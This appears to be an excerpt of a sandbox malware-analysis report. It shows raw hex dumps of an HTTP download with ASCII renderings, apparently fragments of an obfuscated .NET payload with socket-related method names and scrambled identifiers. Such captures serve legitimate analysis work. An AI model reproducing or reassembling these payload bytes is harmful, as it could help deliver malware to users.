2d 35 33 33
                            Data Ascii: -D8A93A-A6C--9DA99C--6C--97AA3--F19-6F31A2E1349--F31A67--F9-5F31ACC1271-5F31A98-171-5E81CA6--21-5F31ABA13A1-4F31AC413D9-4F5B1D513D1-4-AB2DB13B9-4F31AF513A9-414B29C--A9-425B2FC13D1-4F31AFC13D9-4F31A-314C9-414B29C--C9-425B2FC1359-57FA956-471-5F31A67--71-533
                            2021-09-14 19:32:54 UTC141INData Raw: 42 34 36 37 32 36 31 36 44 36 35 2d 2d 35 33 37 34 36 31 36 33 36 42 35 34 37 32 36 31 36 33 36 35 2d 2d 34 34 36 46 37 35 36 32 36 43 36 35 2d 2d 35 32 36 35 36 33 37 34 36 31 36 45 36 37 36 43 36 35 2d 2d 35 33 36 39 37 41 36 35 2d 2d 34 35 36 45 37 35 36 44 2d 2d 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 2d 2d 35 33 37 2d 36 35 36 33 36 39 36 31 36 43 34 36 36 46 36 43 36 34 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 31 37 32 36 37 37 33 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 36 2d 33 31 2d 2d 34 35 37 38 36 33 36 35 37 2d 37 34 36 39 36 46 36 45 2d 2d 34 37 34 33 2d 2d 34 37 37 35 36 39 36 34 2d 2d 34 39
                            Data Ascii: B4672616D65--537461636B5472616365--446F75626C65--52656374616E676C65--53697A65--456E756D--456E7669726F6E6D656E74--537-656369616C466F6C646572--4576656E7441726773--4576656E7448616E646C6572--4576656E7448616E646C65726-31--457863657-74696F6E--4743--47756964--49
                            2021-09-14 19:32:54 UTC149INData Raw: 36 34 39 37 37 33 37 34 34 37 33 36 38 36 37 34 45 35 37 34 37 37 36 36 35 34 31 37 36 34 32 35 31 33 44 2d 2d 32 33 33 44 37 31 36 38 34 35 33 32 35 2d 33 32 36 42 33 34 33 36 36 41 36 39 35 33 35 33 36 41 34 46 33 38 33 36 36 37 33 33 36 45 34 32 33 31 34 44 36 42 34 43 34 37 34 33 33 39 35 46 33 33 36 31 37 36 34 34 37 2d 34 39 33 37 36 39 35 39 36 32 35 35 34 38 37 32 33 35 36 37 33 44 2d 2d 32 33 33 44 37 31 37 36 35 38 32 34 34 41 33 32 33 34 37 32 34 39 33 2d 36 35 34 41 33 2d 36 37 35 37 36 36 34 31 33 36 34 33 34 35 36 34 37 41 35 36 34 41 34 45 33 37 36 32 35 31 34 45 35 46 35 39 35 34 37 35 35 33 33 39 33 38 34 45 33 2d 37 39 37 39 34 44 35 39 35 2d 36 46 33 44 2d 2d 32 33 33 44 37 31 33 36 34 45 36 35 36 45 36 36 35 31 36 32 37 41 35 31 35 39
                            Data Ascii: 6497737447368674E57477665417642513D--233D716845325-326B34366A6953536A4F383667336E42314D6B4C4743395F336176447-493769596255487235673D--233D717658244A323472493-654A3-67576641364345647A564A4E3762514E5F5954755339384E3-79794D595-6F3D--233D71364E656E6651627A5159
                            2021-09-14 19:32:54 UTC156INData Raw: 33 33 37 35 46 37 41 34 43 34 33 34 45 36 34 34 36 34 33 36 39 34 38 37 34 35 2d 34 38 33 31 37 39 35 32 33 39 33 38 37 37 33 37 35 34 36 32 36 44 37 32 35 33 33 34 37 36 35 35 34 35 33 44 2d 2d 34 35 36 45 36 34 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 33 39 33 35 37 37 33 39 34 44 37 2d 36 31 34 37 33 34 35 41 36 33 36 37 36 42 34 37 36 37 36 45 36 44 35 31 34 39 35 34 34 46 36 34 34 38 37 32 33 35 34 39 36 31 34 43 35 38 34 34 33 38 36 31 34 33 33 36 36 46 33 33 34 35 37 31 37 34 34 35 33 2d 35 2d 35 31 33 44 2d 2d 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 37 38 37 2d 33 36 36 33 37 34 33 34 34 41 34 37 34 43 36 31 34 44 34 34 36 32 37 37 36 37 33 36 36 36 36 42 37 32 34 39 34 35 37 37 33 44 33 44 2d 2d 32 33 33 44
                            Data Ascii: 3375F7A4C434E6446436948745-483179523938773754626D7253347655453D--456E64496E766F6B65--233D71393577394D7-6147345A63676B47676E6D5149544F6448723549614C5844386143366F33457174453-5-513D--496E766F6B65--233D71787-366374344A474C614D4462776736666B724945773D3D--233D
                            2021-09-14 19:32:54 UTC163INData Raw: 36 36 37 33 44 33 44 2d 2d 34 35 36 45 37 34 37 32 37 39 34 35 37 38 36 39 37 33 37 34 37 33 2d 2d 34 37 36 35 37 34 34 35 36 45 37 34 37 32 36 39 36 35 37 33 2d 2d 32 33 33 44 37 31 33 32 36 37 37 34 36 38 37 36 34 32 33 36 33 32 36 45 33 2d 33 37 36 36 35 39 35 36 35 34 37 38 33 35 36 36 37 37 34 39 37 31 37 38 34 32 34 31 36 46 33 31 37 34 35 46 36 38 37 33 32 34 36 39 36 43 33 39 34 31 36 33 32 34 33 34 34 36 35 39 35 46 34 37 37 37 33 44 2d 2d 32 33 33 44 37 31 37 32 33 35 37 31 37 2d 37 36 34 46 35 2d 36 45 34 43 37 38 34 43 37 2d 33 36 36 31 34 37 36 42 36 36 34 31 34 44 33 37 37 37 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 36 33 35 37 41 36 45 34 36 36 37 33 2d 35 46 33 32 33 33 33 34 36 45 36 36 36 45 36 38 34 43 33 34 34 39 33 38 37 39 35 32
                            Data Ascii: 6673D3D--456E747279457869737473--476574456E7472696573--233D7132677468764236326E3-37665956547835667749717842416F31745F687324696C394163243446595F47773D--233D717235717-764F5-6E4C784C7-3661476B66414D3777513D3D--233D7136357A6E46673-5F3233346E666E684C3449387952
                            2021-09-14 19:32:54 UTC170INData Raw: 37 34 44 33 33 36 44 34 46 37 36 36 36 37 34 37 32 37 37 33 44 2d 2d 32 33 33 44 37 31 36 42 36 33 35 36 36 42 34 41 37 33 36 42 37 35 34 37 34 31 33 34 36 46 33 37 36 42 34 37 37 35 34 45 33 37 33 39 36 39 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 33 33 34 39 37 34 36 34 33 31 34 35 34 43 34 34 35 2d 34 38 34 41 37 38 36 38 34 43 37 36 37 34 33 2d 37 39 33 31 34 45 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 35 38 36 42 36 37 37 2d 36 36 36 37 36 38 37 36 35 34 34 42 34 34 35 41 34 37 36 43 35 38 34 32 34 37 34 39 33 34 37 38 33 39 37 36 36 35 35 31 34 46 33 34 34 41 36 36 36 41 34 36 33 37 34 37 35 37 33 32 34 35 34 33 37 37 33 39 32 34 34 43 33 33 34 35 37 36 37 39 34 42 35 41 34 37 34 46 36 45 37 41 36 39 37 37 35 38 34 35 33 32 35 38 37 32
                            Data Ascii: 74D336D4F76667472773D--233D716B63566B4A736B754741346F376B47754E37396931773D3D--233D71643349746431454C445-484A78684C76743-79314E513D3D--233D71586B677-66676876544B445A476C584247493478397665514F344A666A463747573245437739244C334576794B5A474F6E7A69775845325872
                            2021-09-14 19:32:54 UTC178INData Raw: 2d 34 32 35 32 34 41 36 34 34 31 37 33 35 39 36 43 35 38 35 33 35 32 35 35 36 33 37 37 36 39 37 41 37 37 33 44 2d 2d 32 33 33 44 37 31 36 46 37 36 36 33 33 2d 34 41 33 37 34 42 33 36 36 32 33 39 34 35 37 31 35 46 34 33 33 2d 34 42 33 34 33 36 37 32 36 32 36 44 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 37 36 36 32 35 34 34 45 34 32 36 39 36 38 34 37 33 32 37 41 34 31 35 32 37 33 36 35 37 37 36 42 35 32 34 39 34 36 35 34 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 35 36 41 33 33 37 37 37 36 34 41 35 38 36 43 36 45 37 32 34 37 36 44 35 32 36 45 34 42 35 35 34 38 37 32 35 46 33 31 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 35 34 39 35 2d 36 33 36 45 36 34 34 46 34 43 37 32 35 36 33 32 34 37 34 41 36 44 36 45 36 46 33 37 37 41 34 42 37 34 34 32
                            Data Ascii: -42524A644173596C585352556377697A773D--233D716F76633-4A374B36623945715F433-4B343672626D673D3D--233D717662544E42696847327A41527365776B5249465453513D3D--233D71356A3377764A586C6E72476D526E4B5548725F3153513D3D--233D7145495-636E644F4C725632474A6D6E6F377A4B7442
                            2021-09-14 19:32:54 UTC185INData Raw: 37 36 41 35 46 36 37 37 34 33 31 33 32 34 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 34 39 36 44 35 2d 34 31 35 39 33 31 36 46 33 33 35 39 36 38 36 32 34 43 37 34 37 35 36 42 37 37 34 33 35 31 33 39 33 31 36 33 34 39 35 33 36 31 36 35 34 39 34 35 35 37 35 32 34 42 35 33 35 39 37 32 34 37 35 41 33 33 36 34 35 34 35 36 36 45 36 42 35 39 33 44 2d 2d 32 33 33 44 37 31 35 46 36 42 34 37 37 39 34 35 36 45 33 38 34 42 37 32 36 44 34 32 36 44 37 34 33 35 34 44 33 31 34 45 33 39 36 33 35 35 35 33 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 32 34 36 45 36 41 36 46 37 2d 35 32 37 32 35 2d 36 32 36 43 37 31 36 35 32 34 37 39 37 32 37 33 32 34 37 32 37 33 37 35 33 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 37 41 36 31 33 37 34 46 33 31 34 31 34 38 37 32 37 32
                            Data Ascii: 76A5F6774313245513D3D--233D7164496D5-4159316F335968624C74756B77435139316349536165494557524B535972475A336454566E6B593D--233D715F6B4779456E384B726D426D74354D314E39635553673D3D--233D71246E6A6F7-52725-626C7165247972732472737535513D3D--233D717A61374F3141487272
                            2021-09-14 19:32:54 UTC192INData Raw: 34 35 37 37 34 33 36 36 36 35 32 36 32 36 35 35 37 36 46 37 38 33 31 37 35 34 45 33 33 37 36 36 36 35 33 35 2d 33 35 37 36 35 46 35 37 35 46 37 37 36 33 33 44 2d 2d 32 33 33 44 37 31 33 2d 35 2d 34 44 36 33 35 38 35 31 34 41 37 38 36 33 34 43 34 43 37 32 33 31 37 33 35 39 34 46 33 2d 36 36 37 2d 37 39 36 38 35 2d 36 41 35 35 37 37 36 41 35 31 37 34 34 39 36 45 34 43 35 46 37 36 34 41 35 2d 35 31 35 33 36 37 34 33 37 33 36 36 36 39 36 46 33 44 2d 2d 32 33 33 44 37 31 34 38 36 31 37 35 36 39 36 41 36 44 36 38 33 32 36 45 34 41 33 35 36 42 34 38 34 46 33 36 36 36 35 34 35 39 34 32 36 45 34 41 34 36 35 41 34 42 36 42 36 36 37 41 36 42 35 37 37 34 33 35 36 37 34 32 33 34 36 44 35 39 35 33 33 35 34 46 34 43 34 46 35 36 36 33 33 44 2d 2d 32 33 33 44 37 31 37 2d
                            Data Ascii: 457743666526265576F7831754E337666535-35765F575F77633D--233D713-5-4D6358514A78634C4C723173594F3-667-79685-6A55776A5174496E4C5F764A5-515367437366696F3D--233D71486175696A6D68326E4A356B484F36665459426E4A465A4B6B667A6B5774356742346D5953354F4C4F56633D--233D717-
                            2021-09-14 19:32:54 UTC199INData Raw: 38 36 31 34 35 35 37 36 45 33 39 37 39 35 41 36 39 34 39 37 39 36 34 34 35 34 33 36 36 33 36 33 39 32 34 36 42 37 34 36 41 33 2d 34 39 35 2d 34 34 33 35 37 37 34 31 37 37 34 33 33 32 34 38 33 35 34 33 36 33 33 38 34 33 32 34 34 43 2d 2d 32 33 33 44 37 31 37 31 37 33 33 31 36 44 36 46 34 46 32 34 36 44 35 39 36 31 35 33 33 37 33 32 34 46 35 38 34 46 35 37 36 35 33 2d 35 41 33 36 34 37 37 39 36 33 37 33 36 43 34 35 36 32 33 36 36 35 33 39 34 39 37 2d 36 46 37 39 33 37 37 2d 37 2d 35 37 33 2d 34 46 33 35 36 31 36 32 34 39 37 2d 33 2d 33 35 36 31 36 41 37 36 33 38 36 34 36 46 37 31 36 34 34 41 35 41 34 38 36 43 34 45 33 33 36 33 34 42 2d 2d 32 33 33 44 37 31 37 39 34 35 34 38 33 35 33 34 34 39 35 37 32 34 36 36 33 39 36 36 35 35 34 41 36 32 33 37 34 36 34 46
                            Data Ascii: 86145576E39795A694979644543663639246B746A3-495-44357741774332483543633843244C--233D717173316D6F4F246D59615337324F584F57653-5A36477963736C4562366539497-6F79377-7-573-4F356162497-3-35616A7638646F71644A5A486C4E33634B--233D717945483534495724663966554A6237464F
                            2021-09-14 19:32:54 UTC207INData Raw: 35 36 34 36 44 34 37 34 31 33 44 2d 2d 32 33 33 44 37 31 34 36 36 43 37 41 32 34 32 34 37 36 36 38 36 43 37 32 36 45 35 41 36 32 33 37 35 39 34 46 36 41 36 39 33 2d 36 35 34 36 35 46 35 31 35 41 34 32 37 41 36 42 34 46 36 31 36 41 35 34 33 2d 37 37 33 33 35 35 36 46 35 31 36 32 36 37 36 45 35 38 35 36 34 39 34 31 33 44 2d 2d 32 33 33 44 37 31 36 39 36 42 34 32 35 38 35 46 34 33 36 44 35 33 32 34 35 41 37 41 35 36 34 31 37 35 37 31 32 34 36 45 35 31 34 41 34 32 34 34 37 37 36 44 34 43 36 44 33 35 34 37 36 35 36 35 33 31 36 39 35 2d 36 43 35 2d 37 35 37 36 34 39 33 31 33 38 33 38 34 35 36 41 36 46 33 44 2d 2d 32 33 33 44 37 31 34 39 34 46 35 38 35 46 37 32 37 37 34 38 37 32 35 33 35 46 35 32 34 43 34 36 34 43 33 32 36 39 36 37 37 41 35 32 37 33 35 35 35 31
                            Data Ascii: 5646D47413D--233D71466C7A242476686C726E5A6237594F6A693-65465F515A427A6B4F616A543-7733556F5162676E585649413D--233D71696B42585F436D53245A7A56417571246E514A4244776D4C6D3547656531695-6C5-757649313838456A6F3D--233D71494F585F72774872535F524C464C3269677A52735551
                            2021-09-14 19:32:54 UTC214INData Raw: 44 37 31 36 34 33 38 35 37 34 39 35 41 34 46 33 38 36 36 33 36 34 39 35 32 37 31 36 34 35 35 36 44 37 36 37 38 36 31 37 37 36 41 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 34 39 35 41 35 2d 33 38 34 39 35 38 33 36 33 2d 36 37 35 33 35 39 34 36 33 38 33 32 36 42 37 35 35 41 36 35 36 41 36 44 36 37 33 38 37 2d 34 46 36 46 35 38 36 36 34 35 34 32 36 33 37 41 36 31 37 2d 35 34 35 34 37 37 36 37 37 32 35 37 34 44 32 34 36 36 34 44 33 44 2d 2d 32 33 33 44 37 31 35 35 35 32 34 39 37 38 34 44 34 46 34 37 33 2d 34 38 34 39 36 44 37 37 34 35 35 2d 33 34 34 31 33 36 37 41 34 35 36 39 35 2d 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 35 33 31 36 37 33 36 36 44 33 31 34 33 36 39 34 41 33 35 37 39 37 41 34 43 34 35 34 33 36 46 37 38 33 31 36 38 34 32 37 32 37 37
                            Data Ascii: D71643857495A4F38663649527164556D767861776A31773D3D--233D71495A5-384958363-6753594638326B755A656A6D67387-4F6F58664542637A617-5454776772574D24664D3D--233D71555249784D4F473-48496D77455-3441367A45695-673D3D--233D71553167366D3143694A35797A4C45436F783168427277
                            2021-09-14 19:32:54 UTC221INData Raw: 45 33 39 36 45 33 34 36 36 34 42 34 31 37 33 37 36 35 37 35 34 33 39 36 33 36 39 37 33 36 31 34 38 35 34 35 46 35 2d 36 37 37 36 36 33 34 37 34 31 34 45 36 45 36 34 33 36 36 46 33 44 2d 2d 32 33 33 44 37 31 34 42 33 35 34 44 36 36 33 39 37 35 37 38 34 34 34 33 36 41 37 37 34 34 35 32 36 36 37 39 34 41 35 31 33 36 36 42 37 2d 33 38 34 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 36 35 41 33 38 37 38 36 44 33 36 33 39 34 33 36 34 33 2d 34 33 33 35 33 35 34 39 37 2d 33 32 34 46 35 32 36 36 33 37 34 45 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 36 35 38 34 32 35 46 37 39 33 33 36 35 34 45 35 46 37 33 37 2d 33 31 32 34 34 44 36 34 33 39 35 35 36 46 34 41 36 35 35 39 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 33 33 37 36 41 36 36 36 33 36 35 34 34 37 2d 37 36
                            Data Ascii: E396E34664B4173765754396369736148545F5-67766347414E6E64366F3D--233D714B354D6639757844436A77445266794A51366B7-38413D3D--233D71465A38786D363943643-433535497-324F5266374E673D3D--233D715658425F7933654E5F737-31244D6439556F4A6559513D3D--233D7133376A666365447-76
                            2021-09-14 19:32:54 UTC228INData Raw: 33 36 35 36 39 37 36 36 35 34 31 37 33 37 39 36 45 36 33 2d 2d 36 37 36 35 37 34 35 46 35 33 36 46 36 33 36 42 36 35 37 34 34 35 37 32 37 32 36 46 37 32 2d 2d 36 37 36 35 37 34 35 46 34 43 36 31 37 33 37 34 34 46 37 2d 36 35 37 32 36 31 37 34 36 39 36 46 36 45 2d 2d 36 37 36 35 37 34 35 46 34 32 37 39 37 34 36 35 37 33 35 34 37 32 36 31 36 45 37 33 36 36 36 35 37 32 37 32 36 35 36 34 2d 2d 36 37 36 35 37 34 35 46 34 32 37 35 36 36 36 36 36 35 37 32 2d 2d 35 32 36 35 37 33 36 39 37 41 36 35 2d 2d 34 33 36 46 36 43 36 43 36 35 36 33 37 34 2d 2d 36 37 36 35 37 34 35 46 34 46 36 36 36 36 37 33 36 35 37 34 2d 2d 35 33 36 35 36 45 36 34 34 31 37 33 37 39 36 45 36 33 2d 2d 35 2d 37 34 37 32 35 34 36 46 35 33 37 34 37 32 37 35 36 33 37 34 37 35 37 32 36 35 2d 2d
                            Data Ascii: 3656976654173796E63--6765745F536F636B65744572726F72--6765745F4C6173744F7-65726174696F6E--6765745F42797465735472616E73666572726564--6765745F427566666572--526573697A65--436F6C6C656374--6765745F4F6666736574--53656E644173796E63--5-7472546F537472756374757265--
                            2021-09-14 19:32:54 UTC236INData Raw: 2d 31 32 38 32 37 44 2d 38 32 2d 2d 33 31 44 2d 35 31 44 2d 35 2d 38 2d 38 2d 35 2d 37 2d 31 31 32 38 31 31 39 2d 35 32 2d 2d 32 2d 31 2d 45 2d 32 2d 35 2d 37 2d 33 2d 32 2d 38 2d 38 2d 37 32 2d 2d 33 2d 31 2d 32 2d 45 31 2d 2d 32 2d 34 2d 2d 2d 31 2d 31 2d 38 2d 38 2d 37 2d 32 31 32 38 2d 45 35 31 32 38 31 31 39 2d 38 2d 2d 2d 31 31 32 38 2d 45 31 31 32 38 2d 45 35 2d 37 2d 37 2d 35 2d 45 2d 45 2d 45 2d 45 2d 45 2d 35 2d 2d 2d 2d 31 32 38 32 42 35 2d 35 32 2d 2d 31 2d 45 31 44 2d 35 2d 38 2d 2d 2d 33 2d 32 2d 45 2d 45 31 31 38 32 42 31 2d 35 32 2d 2d 32 2d 45 2d 45 2d 45 2d 36 2d 2d 2d 31 2d 32 31 32 38 32 45 31 2d 35 2d 37 2d 32 2d 32 31 32 33 35 2d 33 2d 36 31 32 33 35 2d 36 32 2d 2d 32 31 32 33 35 2d 45 2d 32 2d 34 2d 2d 2d 31 2d 38 31 43 2d 36 2d 37
                            Data Ascii: -12827D-82--31D-51D-5-8-8-5-7-1128119-52--2-1-E-2-5-7-3-2-8-8-72--3-1-2-E1--2-4---1-1-8-8-7-2128-E5128119-8---1128-E1128-E5-7-7-5-E-E-E-E-E-5----1282B5-52--1-E1D-5-8---3-2-E-E1182B1-52--2-E-E-E-6---1-21282E1-5-7-2-21235-3-61235-62--21235-E-2-4---1-81C-6-7
                            2021-09-14 19:32:54 UTC243INData Raw: 44 42 35 32 38 35 39 41 45 33 45 43 36 41 41 34 41 37 36 41 34 42 46 43 38 34 35 34 32 41 45 33 34 33 43 2d 32 44 31 44 36 42 36 43 37 35 42 38 39 42 38 33 32 46 44 38 35 35 34 41 36 31 42 37 37 41 43 33 37 34 43 32 46 35 2d 2d 41 35 41 35 33 34 33 45 37 37 35 31 32 41 42 35 32 33 32 44 38 39 39 36 41 36 43 44 39 39 37 46 44 42 36 2d 35 45 36 37 41 39 2d 36 39 33 34 41 45 32 31 41 42 44 36 37 37 35 2d 31 43 36 45 44 32 42 41 38 36 35 32 46 41 2d 46 31 35 42 36 2d 46 2d 32 37 31 46 35 45 41 41 32 2d 35 44 43 31 45 35 2d 32 45 37 34 44 31 39 44 38 38 39 36 46 2d 44 42 38 41 38 2d 34 37 36 32 36 2d 34 35 41 36 31 37 34 41 32 33 37 44 37 35 46 39 31 41 39 41 36 45 45 42 43 35 38 2d 45 35 31 42 43 2d 32 37 36 2d 41 32 44 35 2d 2d 42 38 31 43 37 33 43 35 31 43
                            Data Ascii: DB52859AE3EC6AA4A76A4BFC84542AE343C-2D1D6B6C75B89B832FD8554A61B77AC374C2F5--A5A5343E77512AB5232D8996A6CD997FDB6-5E67A9-6934AE21ABD6775-1C6ED2BA8652FA-F15B6-F-271F5EAA2-5DC1E5-2E74D19D8896F-DB8A8-47626-45A6174A237D75F91A9A6EEBC58-E51BC-276-A2D5--B81C73C51C
                            2021-09-14 19:32:54 UTC250INData Raw: 32 38 35 33 33 35 43 44 2d 33 43 45 37 33 35 37 37 36 37 35 46 37 34 32 2d 42 2d 32 45 37 34 42 33 43 45 38 42 32 36 37 37 45 37 34 36 36 2d 31 43 31 37 34 37 37 34 38 42 45 43 36 37 35 31 42 42 2d 41 32 43 42 42 43 44 38 33 42 38 35 31 34 32 37 37 41 37 37 44 41 33 2d 43 32 45 32 37 33 36 38 38 44 41 37 37 44 45 44 32 33 45 37 36 45 34 44 44 43 43 32 31 43 42 2d 33 31 39 33 39 45 39 34 42 41 42 33 39 46 44 2d 39 33 42 43 32 39 35 44 42 45 45 37 39 41 46 34 34 37 41 37 37 35 38 43 37 32 45 35 41 32 44 42 41 2d 37 42 45 38 46 41 32 31 36 41 43 32 33 38 46 33 41 44 36 32 46 32 46 45 42 32 46 42 33 2d 2d 35 45 42 46 39 44 43 42 42 34 37 32 46 43 38 2d 31 41 44 43 35 2d 34 45 41 33 45 31 32 39 43 46 2d 32 36 43 2d 36 39 31 43 38 39 42 42 2d 37 37 34 34 34 46
                            Data Ascii: 285335CD-3CE73577675F742-B-2E74B3CE8B2677E7466-1C1747748BEC6751BB-A2CBBCD83B8514277A77DA3-C2E273688DA77DED23E76E4DDCC21CB-31939E94BAB39FD-93BC295DBEE79AF447A7758C72E5A2DBA-7BE8FA216AC238F3AD62F2FEB2FB3--5EBF9DCBB472FC8-1ADC5-4EA3E129CF-26C-691C89BB-77444F
                            2021-09-14 19:32:54 UTC257INData Raw: 34 37 42 45 34 2d 38 46 33 43 45 42 44 46 32 38 45 41 39 45 36 39 32 36 38 34 37 35 46 45 45 39 43 46 44 33 34 46 37 44 2d 44 31 46 34 2d 38 33 2d 31 46 37 35 32 31 46 36 37 32 39 42 37 36 41 46 2d 32 46 42 46 36 39 35 31 43 31 34 36 44 2d 45 37 33 32 33 31 45 38 44 2d 35 39 37 32 43 43 38 33 2d 41 31 33 33 33 43 37 2d 45 44 32 43 35 32 32 38 37 2d 46 46 2d 31 36 38 41 34 32 38 34 44 2d 34 44 41 39 38 41 39 43 45 38 31 33 34 36 39 32 33 43 43 39 34 35 32 38 45 33 32 39 38 36 32 35 33 39 34 37 35 41 33 43 34 45 41 36 41 33 45 2d 33 34 46 33 2d 34 33 31 39 32 31 36 33 35 32 2d 44 38 2d 39 39 33 37 31 36 39 33 46 36 43 43 43 38 46 33 45 39 33 32 35 44 35 39 32 32 42 35 37 44 33 36 2d 39 43 41 36 36 35 37 44 2d 43 46 34 42 31 36 46 43 34 39 2d 33 38 44 37 38
                            Data Ascii: 47BE4-8F3CEBDF28EA9E69268475FEE9CFD34F7D-D1F4-83-1F7521F6729B76AF-2FBF6951C146D-E73231E8D-5972CC83-A1333C7-ED2C52287-FF-168A4284D-4DA98A9CE81346923CC94528E329862539475A3C4EA6A3E-34F3-4319216352-D8-99371693F6CCC8F3E9325D5922B57D36-9CA6657D-CF4B16FC49-38D78
                            2021-09-14 19:32:54 UTC264INData Raw: 37 46 36 2d 33 35 36 38 2d 31 35 39 38 37 35 34 37 31 46 43 35 2d 41 46 37 2d 42 2d 32 46 43 38 44 45 39 35 34 2d 42 35 45 41 34 43 44 45 35 41 36 34 37 39 35 32 31 34 2d 33 45 2d 46 37 34 42 41 31 41 45 34 45 46 39 37 34 44 46 39 36 32 46 32 31 33 45 42 33 43 2d 41 42 32 46 46 39 37 36 32 39 37 34 35 33 36 45 42 39 35 43 43 45 44 31 31 45 45 39 41 31 35 41 31 38 43 45 43 33 2d 38 44 41 38 43 34 46 2d 44 42 45 42 39 44 37 44 34 41 45 36 36 46 37 31 33 34 43 44 41 33 43 46 31 42 43 38 33 2d 2d 32 36 43 39 34 34 2d 35 43 31 43 42 43 32 46 32 33 43 42 43 37 42 41 33 32 39 43 45 46 39 38 37 33 45 2d 32 45 42 38 36 45 34 39 45 44 41 33 32 37 36 34 36 46 34 44 39 43 42 45 35 31 45 46 36 35 45 38 31 31 38 41 42 46 41 32 42 43 41 32 44 38 38 31 42 44 42 42 42 38
                            Data Ascii: 7F6-3568-159875471FC5-AF7-B-2FC8DE954-B5EA4CDE5A64795214-3E-F74BA1AE4EF974DF962F213EB3C-AB2FF9762974536EB95CCED11EE9A15A18CEC3-8DA8C4F-DBEB9D7D4AE66F7134CDA3CF1BC83--26C944-5C1CBC2F23CBC7BA329CEF9873E-2EB86E49EDA327646F4D9CBE51EF65E8118ABFA2BCA2D881BDBBB8
                            2021-09-14 19:32:54 UTC272INData Raw: 42 33 37 36 46 35 41 36 2d 41 42 46 32 46 43 35 33 45 31 32 33 39 44 37 36 43 45 34 45 33 42 33 35 31 43 42 32 39 41 32 2d 41 36 31 35 37 38 44 38 2d 41 43 46 33 2d 37 42 32 41 2d 46 45 41 2d 2d 31 34 35 46 38 41 37 44 42 36 35 38 41 36 42 43 39 39 43 35 37 35 41 31 2d 37 37 33 46 46 36 2d 45 32 39 37 32 31 41 2d 45 45 41 42 34 44 32 41 33 33 35 41 2d 34 32 41 37 41 42 43 41 39 44 33 39 41 36 34 32 35 33 32 34 42 35 35 38 36 46 39 45 42 32 43 33 42 31 34 42 38 2d 31 2d 39 34 37 43 34 38 35 35 43 45 36 32 39 31 35 46 42 37 41 43 2d 44 31 31 33 36 35 38 36 41 45 31 31 44 34 43 36 41 39 32 31 2d 31 45 42 31 33 43 45 45 45 43 43 33 32 2d 38 33 2d 36 33 31 45 33 38 45 31 37 41 38 41 32 43 36 2d 39 34 35 44 36 36 36 41 39 32 39 44 36 31 2d 45 32 36 34 38 31 45
                            Data Ascii: B376F5A6-ABF2FC53E1239D76CE4E3B351CB29A2-A61578D8-ACF3-7B2A-FEA--145F8A7DB658A6BC99C575A1-773FF6-E29721A-EEAB4D2A335A-42A7ABCA9D39A6425324B5586F9EB2C3B14B8-1-947C4855CE62915FB7AC-D1136586AE11D4C6A921-1EB13CEEECC32-83-631E38E17A8A2C6-945D666A929D61-E26481E
                            2021-09-14 19:32:54 UTC279INData Raw: 39 35 2d 36 31 34 44 41 44 41 37 33 35 31 35 31 45 39 32 32 44 42 46 46 31 36 2d 2d 34 35 36 42 41 44 43 44 46 35 45 39 41 2d 42 43 38 33 37 38 43 32 45 38 41 39 34 46 31 38 32 44 43 31 45 33 36 37 31 37 44 34 37 33 37 34 39 36 34 31 38 35 46 38 41 41 2d 33 45 35 46 31 31 44 34 44 41 37 31 38 33 34 2d 44 2d 46 37 32 44 39 37 34 45 33 37 44 35 37 39 33 36 34 41 35 32 42 35 35 39 44 32 42 32 37 43 31 46 37 43 46 38 42 2d 33 42 38 44 32 31 32 39 38 37 41 41 34 39 33 43 34 38 36 41 2d 41 37 44 32 2d 37 38 44 36 35 38 31 41 39 46 36 38 39 31 33 35 32 2d 36 44 42 37 46 42 35 33 31 38 35 34 39 32 32 44 45 41 45 33 43 39 41 2d 39 36 35 41 31 2d 32 35 41 34 34 39 32 41 43 42 44 34 41 37 43 33 2d 31 41 45 35 33 37 43 42 41 31 35 39 2d 44 2d 2d 38 44 46 44 46 37 31
                            Data Ascii: 95-614DADA735151E922DBFF16--456BADCDF5E9A-BC8378C2E8A94F182DC1E36717D47374964185F8AA-3E5F11D4DA71834-D-F72D974E37D579364A52B559D2B27C1F7CF8B-3B8D212987AA493C486A-A7D2-78D6581A9F6891352-6DB7FB531854922DEAE3C9A-965A1-25A4492ACBD4A7C3-1AE537CBA159-D--8DFDF71
                            2021-09-14 19:32:54 UTC286INData Raw: 31 41 36 35 45 31 32 45 39 36 35 37 38 43 41 45 46 37 44 39 46 41 36 35 34 32 38 35 32 35 44 2d 43 39 34 46 35 46 38 39 38 41 35 39 41 39 38 36 37 46 35 36 36 46 45 33 41 37 42 35 39 43 33 42 39 44 34 32 38 38 2d 41 44 36 34 37 44 44 41 45 42 45 33 41 37 43 35 38 35 31 2d 44 44 44 33 34 39 39 33 42 38 44 2d 39 39 31 34 31 35 35 42 37 32 41 44 46 33 33 32 39 43 44 38 2d 34 34 32 31 45 31 36 39 45 41 36 38 35 34 42 31 42 41 41 43 35 41 45 46 2d 42 44 34 39 2d 34 45 37 41 38 37 36 44 35 34 34 35 44 42 45 34 39 42 34 33 46 33 39 33 41 37 36 33 44 41 38 33 33 41 43 38 33 41 38 35 43 39 39 31 45 45 45 36 2d 46 36 33 34 34 2d 41 33 42 41 37 39 39 31 46 35 41 34 34 39 37 46 37 43 32 31 41 35 38 45 42 44 43 39 38 46 34 44 34 42 35 46 